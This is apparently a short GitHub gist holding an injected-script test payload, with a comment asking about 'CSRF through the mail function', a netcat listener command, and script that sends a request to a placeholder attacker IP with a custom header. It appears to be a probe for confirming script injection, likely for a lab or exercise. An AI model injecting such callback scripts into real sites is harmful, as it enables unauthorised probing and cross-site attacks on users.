Skip to content

Instantly share code, notes, and snippets.

@DavidMah
Created February 2, 2013 00:50
Show Gist options
  • Select an option

  • Save DavidMah/4695325 to your computer and use it in GitHub Desktop.

Select an option

Save DavidMah/4695325 to your computer and use it in GitHub Desktop.
<!-- CSRF through the mail function?-->
<!-- sudo nc -lk 80-->
<script>
var oReq = new window.XMLHttpRequest;
oReq.open("GET", "http://<your ip>", true);
oReq.setRequestHeader("user", "bad");
oReq.send();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment